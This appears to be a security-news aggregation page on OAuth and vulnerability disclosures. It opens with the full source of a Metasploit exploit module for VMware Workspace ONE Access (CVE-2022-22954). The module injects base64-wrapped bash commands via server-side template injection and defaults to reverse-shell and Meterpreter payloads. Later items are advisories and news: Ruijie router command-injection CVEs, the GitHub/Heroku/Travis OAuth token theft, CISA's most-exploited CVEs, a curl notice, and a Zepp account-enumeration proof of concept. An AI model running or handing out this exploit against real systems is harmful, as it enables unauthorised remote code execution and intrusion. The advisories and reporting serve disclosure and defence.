This Metasploit module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) vulnerability in VMware Workspace ONE Access, to execute shell commands as the horizon user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware Workspace ONE Access CVE-2022-22954',        'Description' => %q{          This module exploits CVE-2022-22954, an unauthenticated server-side          template injection (SSTI) in VMware Workspace ONE Access, to execute          shell commands as the "horizon" user.        },        'Author' => [          'mr_me', # Discovery          'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC          'wvu' # Exploit and independent analysis        ],        'References' => [          ['CVE', '2022-22954'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],          ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],          ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],          ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']          # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433        ],        'DisclosureDate' => '2022-04-06',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    ret = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")    return CheckCode::Unknown unless ret    return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)    CheckCode::Vulnerable  end  def exploit    print_status("Executing #{payload_instance.refname} (#{target.name})")    case target['Type']    when :cmd      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  end  def execute_command(cmd, _opts = {})    bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}"    vprint_status("Executing command: #{bash_cmd}")    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, ssti_uri),      'vhost' => rand_text_alphanumeric(8..16),      'vars_get' => {        %w[code error].sample => rand_text_alphanumeric(8..16),        # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html        ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})      }    }, 3.5)    return unless res    return '' unless res.code == 400 && res.body.include?('auth.context.invalid')    res.body  end  def ssti_uri    %w[      /catalog-portal/hub-ui      /catalog-portal/hub-ui/byob      /catalog-portal/ui      /catalog-portal/ui/oauth/verify    ].sample  end  def ssti_param    %w[deviceType deviceUdid].sample  endend

VMware Workspace ONE Access Template Injection / Command Execution

Ruijie RG-EW series routers suffer from six different remote code execution vulnerabilities. Findings were tested on Ruijie RG-EW1200 and Ruijie RG-EW1200G PRO.

Advisory: Multiple Vulnerabilities in Ruijie RG-EW Series Routers

=======  
Summary  
=======

Multiple vulnerabilities was found in Ruijie RG-EW Series Routers from  
Ruijie Networks, including 1 pre-authenticated and 5 post-authenticated  
Remote Code Execution (RCE).

==============  
CVE-2021-43159  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the setSessionTime function in /cgi-bin/luci/api/common.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/common.lua  
     Function: setSessionTime  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43160  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the switchFastDhcp function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/diagnose.lua  
     Function: switchFastDhcp  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43161  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the doSwitchApi function in /cgi-bin/luci/api/switch.

## Details  
- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/switch.lua  
     Function: doSwitchApi  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43162  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the runPackDiagnose function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/diagnose.lua  
     Function: runPackDiagnose  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43163  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the checkNet function in /cgi-bin/luci/api/auth.

## Details

- Type: Pre-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/noauth.lua  
     Function: checkNet  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43164  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the updateVersion function in /cgi-bin/luci/api/wireless.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/wireless.lua  
     Function: updateVersion  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

--   
Khoa

Ruijie RG-EW Remote Code Execution

An issue was discovered in Logitech Options. The OAuth 2.0 state parameter was not properly validated. This leaves applications vulnerable to CSRF attacks during authentication and authorization operations.

*   Register
*   Getting Started
*   FAQ
*   Community
*   Downloads
*   Warranty
*   Specifications
*   Spare Parts
*   Gallery
*   Contact Us

**There are no Downloads for this Product**

**There are no FAQs for this Product**

**There are no Spare Parts available for this Product**

Logitech Options

More

Check our Logitech Warranty here

**Make the Most of your warranty**

Register Your Product FIle a Warranty Claim

**Frequently Asked Questions**

*   Windows
    
    {\[{versionList\[key\]}\]}
    
    Mac
    
    {\[{versionList\[key\]}\]}
    
    Other
    
    {\[{versionList\[key\]}\]}
    

**There are no Downloads for this Version.**

Show All Downloads

**Compatible Product**

**Product Specific Phone Numbers**

**Main Phone Numbers**

CVE-2022-0916: Logitech Options

Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature.
"This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an

Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature.

"This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an updated post.

The security incident, which it discovered on April 12, related to an unidentified attacker leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM.

The Microsoft-owned company said last week that it's in the process of sending a final set of notifications to GitHub customers who had either the Heroku or Travis CI OAuth app integrations authorized in their accounts.

According to a detailed step-by-step analysis carried out by GitHub, the adversary is said to have employed the stolen app tokens to authenticate to the GitHub API, using it to list all the organizations of affected users.

This was then succeeded by selectively choosing targets based on the listed organizations, following it up by listing the private repositories of valuable users accounts, before moving to clone some of those private repositories ultimately.

The company also reiterated that the tokens were not obtained via a compromise of GitHub or its systems, and that the tokens are not stored in their "original, usable formats," which could be misused by an attacker.

"Customers should also continue to monitor Heroku and Travis CI for updates on their own investigations into the affected OAuth applications," GitHub noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

GitHub Says Recent Attack Involving Stolen OAuth Tokens Was "Highly Targeted"

International cybersecurity authorities have published an overview of the most routinely exploited vulnerabilities of 2021.
The post The top 5 most routinely exploited vulnerabilities of 2021 appeared first on Malwarebytes Labs.

A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.

**1\. Log4Shell**

CVE-2021-44228, commonly referred to as Log4Shell or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.

When Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.

This made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.

The Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The CISA Log4j scanner is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.

**2\. CVE-2021-40539**

CVE-2021-40539 is a REST API authentication bypass vulnerability in ManageEngine’s single sign-on (SSO) solution with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that APT threat-actors were likely among those exploiting the vulnerability.

The vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.

For those that have never heard of this software, it’s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.

The ManageEngine site has specific instructions on how to identify and update vulnerable installations.

**3\. ProxyShell**

Third on the list are 3 vulnerabilities that we commonly grouped together and referred to as ProxyShell. CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207.

The danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:

*   **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.
*   **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.
*   **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.

The vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.

Microsoft’s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.

**4\. ProxyLogon**

After the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name—ProxyLogon—for similar reasons. CVE-2021-26855, CVE-2021-26857, CVE-2021-2685, and CVE-2021-27065 all share the same description—”This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.”

While the CVE description is the same for the 4 CVE’s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws—CVE-2021-26858 and CVE-2021-27065—would allow an attacker to write a file to any part of the server.

Together these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.

ProxyLogon started out as a limited and targeted attack method attributed to a group called Hafnium. Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

Microsoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a download link, user instructions, and more information can be found in the Microsoft Security Response Center.

**5\. CVE-2021-26084**

CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of Confluence Server and Data Center that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.

Shortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.

On the Confluence Support website you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.

**Lessons learned**

What does this list tell us to look out for in 2022?

Well, first off, if you haven’t patched one of the above we would urgently advise you to do so. And it wouldn’t hurt to continue working down the list provided by CISA.

Second, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:

*   **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.
*   **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.
*   **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.

So, if you notice or hear about a vulnerability that meets these “requirements” move it to the top of your “to-patch” list.

Stay safe, everyone!

The top 5 most routinely exploited vulnerabilities of 2021

Ubuntu Security Notice 5397-1 - Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2. An attacker could possibly use this issue to access sensitive information. Harry Sintonen discovered that curl incorrectly handled certain requests. An attacker could possibly use this issue to expose sensitive information.

    =========================================================================Ubuntu Security Notice USN-5397-1April 28, 2022curl vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 21.10- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in curl.Software Description:- curl: HTTP, HTTPS, and FTP client and client librariesDetails:Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2.An attacker could possibly use this issue to access sensitive information.(CVE-2022-22576)Harry Sintonen discovered that curl incorrectly handled certain requests.An attacker could possibly use this issue to expose sensitive information.(CVE-2022-27774, CVE-2022-27775, CVE-2022-27776)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  curl                            7.81.0-1ubuntu1.1  libcurl3-gnutls                 7.81.0-1ubuntu1.1  libcurl3-nss                    7.81.0-1ubuntu1.1  libcurl4                        7.81.0-1ubuntu1.1Ubuntu 21.10:  curl                            7.74.0-1.3ubuntu2.1  libcurl3-gnutls                 7.74.0-1.3ubuntu2.1  libcurl3-nss                    7.74.0-1.3ubuntu2.1  libcurl4                        7.74.0-1.3ubuntu2.1Ubuntu 20.04 LTS:  curl                            7.68.0-1ubuntu2.10  libcurl3-gnutls                 7.68.0-1ubuntu2.10  libcurl3-nss                    7.68.0-1ubuntu2.10  libcurl4                        7.68.0-1ubuntu2.10Ubuntu 18.04 LTS:  curl                            7.58.0-2ubuntu3.17  libcurl3-gnutls                 7.58.0-2ubuntu3.17  libcurl3-nss                    7.58.0-2ubuntu3.17  libcurl4                        7.58.0-2ubuntu3.17In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5397-1  CVE-2022-22576, CVE-2022-27774, CVE-2022-27775, CVE-2022-27776Package Information:  https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.1  https://launchpad.net/ubuntu/+source/curl/7.74.0-1.3ubuntu2.1  https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.10  https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.17

Ubuntu Security Notice USN-5397-1

Tokens stollen and abused but problem has been contained

Tokens stollen and abused but problem has been contained

GitHub has revealed details of a security breach that has allowed an unknown attacker to download data from dozens of private code repositories.

The attacker authenticated to the GitHub API using stolen OAuth user tokens issued to two third-party OAuth integrators – Heroku and Travis-CI.

In most cases where the affected Heroku or Travis CI OAuth apps were authorized in the users' GitHub accounts, the attacker listed all the user’s organizations before selecting targets.

More specifically, the attacker listed the private repositories for user accounts of interest, and then proceeded to clone some of those private repositories.

Catch up with the latest secure development news and analysis

“Looking across the entire GitHub platform, we have high confidence that compromised OAuth user tokens from Heroku and Travis CI-maintained OAuth applications were stolen and abused to download private repositories belonging to dozens of victim organizations that were using these apps,” GitHub warned in a blog post.

“Our analysis of other behavior by the threat actor suggests that the actors may be mining the downloaded private repository contents, to which the stolen OAuth token had access, for secrets that could be used to pivot \[attacks\] into other infrastructure.”

**Timeline**

GitHub discovered the breach on April 12, when the attacker accessed GitHub’s npm production infrastructure, and disclosed the breach three days later.

Along with Heroku and Travis CI, GitHub has revoked all OAuth tokens to block further access, while still advising affected organizations to keep monitoring for suspicious activity.

Travis CI says it doesn’t believe that the incident poses a risk to customers. “The hacker breached a Heroku service and accessed a private application OAuth key used to integrate the Heroku and Travis CI application.

“This key does not provide access to any Travis CI customer repositories or any Travis CI customer data,” it said in a blog post.

“We thoroughly investigated this issue and found no evidence of intrusion into a private customer repository (i.e. source code) as the OAuth key stolen in the Heroku attack does not provide that type of access.”

Heroku is advising customers who see evidence of exfiltration in their logs to check repositories for any credentials that may have been compromised, and mitigate access by disabling accounts and rotating credentials as needed. It also recommends revoking or rotating any exposed credentials.

“For the protection of our customers, we will not be reconnecting to GitHub until we are certain that we can do so safely, which may take some time,” it warned. “We recommend that customers use alternate methods rather than waiting for us to restore this integration.”

YOU MAY ALSO LIKE Git security vulnerabilities prompt update

GitHub offers post-mortem on recent security breach

GitHub shared the timeline of breaches in April 2022, this timeline encompasses the information related to when a threat actor gained access and stole private repositories belonging to dozens of organizations.

GitHub shared the timeline of breaches in April 2022, this timeline encompasses the information related to when a threat actor gained access and stole private repositories belonging to dozens of organizations.

GitHub revealed details tied to last week’s incident where hackers, using stolen OAuth tokens, downloaded data from private repositories.

“We do not believe the attacker obtained these tokens via a compromise of GitHub or its systems because the tokens in question are not stored by GitHub in their original, usable formats,” said Mike Hanley, chief security officer, GitHub.

The OAuth (Open Authorization) is an open standard authorization framework or protocol for token-based authorization on the internet. It enables the end-user account information to be used by third-party services, such as Facebook and Google.  

OAuth doesn’t share credentials instead uses the authorization token to prove identity and acts as an intermediary to approve one application interacting with another.

Incidents of stolen or found OAuth tokens commandeered by adversaries are not uncommon.

Microsoft suffered an OAuth flaw in December 2021, where applications (Portfolios, O365 Secure Score, and Microsoft Trust Service) were vulnerable to authentication issues that enables attackers to takeover Azure accounts. In order to abuse, the attacker first registers their malicious app in the OAuth provider framework with the redirection URL points to the phishing site. Then, the attacker would send the phishing email to their target with a URL for OAuth authorization.

****Analysis of The Attacker’s Behavior** **

GitHub analysis the incident include that the attackers authenticated to the GitHub API using the stolen OAuth tokens issued to accounts Heroku and Travis CI. It added, most most of those affected authorized Heroku or Travis CI OAuth apps in their GitHub accounts. Attacks were selective and attackers listed the private repositories of interest. Next, attackers proceeded to clone private repositories.

“This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories,” Hanley said. “GitHub believes these attacks were highly targeted,” he added.

GitHub said it is in the process of sending the final notification to its customer who had either Travis CI or Heroku OAuth apps integrated into their GitHub accounts.

****Initial Detection of The Malicious Activity****

GitHub began the investigation into the stolen tokens on April 12, when the GitHub Security first identified unauthorized access to the NPM (Node Package Management) production infrastructure using a compromised AWS API key. These API keys were acquired by attackers when they downloaded a set of private NPM repositories using stolen OAuth token.

The NPM is a tool used to download or publish node packages via the npm package registry.

The OAuth token access is revoked by Travis CI, Heroku, and GitHub after discovering the attack, and the affected organizations are advised to monitor the audit logs and user account security logs for malicious activity.

Reported By: Sagar Tiwari, an independent security researcher and technical writer.

Attacker Breach ‘Dozens’ of GitHub Repos Using Stolen OAuth Tokens

The startup is the latest company to try to solve the problem of organizing and sharing secrets.

Secrets management continues to be an ongoing challenge in application security, as developers struggle to organize secrets used in source code and manage distributed systems and infrastructure.

The latest startup to address this space is Doppler, whose platform helps developers securely store, transmit, and audit secrets. The Doppler platform syncs secrets across devices, environments, and team members so that developers don't wind up sharing secrets on insecure platforms (such as Slack or email) or including them within .git and .zip files. The platform can also handle secrets rotation, and it sends developers alerts over Slack and Microsoft Teams to inform them when the secrets are changed.

Secrets refer to sensitive pieces of data, such as tokens, encryption keys, API keys, and digital certificates. A survey by 1Password last year found that 65% of companies juggle more than 500 secrets, and 18% said they have "more than they can count."

The secrets are scattered across source code, container and infrastructure images, and configuration files. Over 6 million secrets were detected in scans of public GitHub repositories in 2021, according to GitGuardian's State of Secrets Sprawl 2022 report.

Adversaries routinely attempt to intercept these secrets in order to gain access to cloud environments, help with lateral movement, and access data in applications. Earlier this month, GitHub said adversaries were able to download private data from some organizations using Heroku and Travis-CI after stealing a handful of OAuth tokens used by those two platforms. Last year, attackers compromised Codecov and stole secrets belonging to Codecov's customers. Those secrets were then used to compromise the customers.

1Password estimates the cost of a company losing control of its secrets at $1.2 million per year.

**Security Management Is Key**  
Enterprises need processes in place to handle secrets management, such as inventorying what secrets they have, controlling access, sharing secrets safely with collaborators, and promptly revoking those secrets when they are exposed. It also needs to be scalable, considering the sheer number of secrets developers are using, and not time-intensive.

In the same 1Password survey, DevOps and IT workers said they spend an average of 25 minutes each day managing secrets – which the company estimated to add up to an annual payroll expense of roughly $8.5 billion.

Secrets management is shaping up to be a fairly crowded market. HashiCorp Vault offers a vault for teams to securely store tokens, passwords, certificates, and encryption keys. 1Password acquired SecretHub last year, which was the basis for its 1Password Secrets Automation service. Cloud giants Amazon Web Services and Google Cloud offer AWS Secrets Manager and Secrets Manager, respectively. GitHub, GitLab, and Atlassian all offer various levels of secrets-scanning tools for their code repositories.

Then there's Doppler, which recently raised $20 million as part of a series A funding round.

"The ability to securely store, transmit and audit secrets has never been more critical as one minor error can lead to catastrophic results," said Murat Bicer, a general partner at CRV (which led the funding round), in a statement. "In a world where putting a single space in the wrong place can literally take down a company's entire website, Doppler makes it easy to prevent leaks and outages with their developer focused approach."

Doppler Takes on Secrets Management

Zepp version 6.1.4-play suffers from a user account enumeration flaw in the password reset function.

# Trovent Security Advisory 2108-02 #  
#####################################

User account enumeration in password reset function  
###################################################

Overview  
########

Advisory ID: TRSA-2108-02  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2108-02  
Affected product: Zepp Android mobile application (com.huami.watch.hmwatchmanager)  
Tested versions: Zepp 6.1.4-play  
Vendor: Huami Inc., https://www.zepp.com  
Credits: Trovent Security GmbH, Karima Hebbal

Detailed description  
####################

Zepp is a mobile application to collect health information from Zepp or Amazfit  
devices.  
Trovent Security GmbH discovered a user account enumeration vulnerability in  
the password reset function of the Zepp mobile application.  
This vulnerability allows to check if a user with a specific email address is  
registered or not.

Severity: Medium  
CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)  
CWE ID: CWE-204  
CVE ID: N/A

Proof of concept  
################

Sample HTTP request sent with a registered email address:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DELETE /registrations/ptesttest33%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2  
Host: api-user.huami.com  
App_name: com.huami.midong  
Accept-Language: en-US  
X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)  
Accept-Encoding: gzip, deflate  
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The server response to a valid email address:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/2 202 Accepted  
Date: Mon, 30 Aug 2021 12:38:52 GMT  
Content-Type: application/json  
Content-Length: 39  
Vary: Origin  
Vary: Access-Control-Request-Method  
Vary: Access-Control-Request-Headers

"HuaMi Oauth / User Registration 2.0.2"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sample HTTP request sent with a non-registered email address:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DELETE /registrations/false%40gmail.com/password?region=us-west-2&marketing=AmazFit HTTP/2  
Host: api-user.huami.com  
App_name: com.huami.midong  
Accept-Language: en-US  
X-Request-Id: a8a25f6c-e392-4013-b39d-d8b68db532a0  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)  
Accept-Encoding: gzip, deflate  
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The server response to an invalid email address:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/2 404 Not Found  
Date: Mon, 30 Aug 2021 12:40:08 GMT  
Content-Type: application/json  
Content-Length: 39  
Vary: Origin  
Vary: Access-Control-Request-Method  
Vary: Access-Control-Request-Headers

"HuaMi Oauth / User Registration 2.0.2"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution / Workaround  
#####################

Ensure the application returns a consistent message for both existent and  
non-existent accounts during the password reset process.

History  
#######

2021-08-30: Vulnerability found & advisory created  
2021-09-24: Vendor contacted  
2021-10-25: Vendor contacted again  
2021-11-18: Vendor contacted again  
2022-04-27: No reaction from vendor, advisory published

Tag

#oauth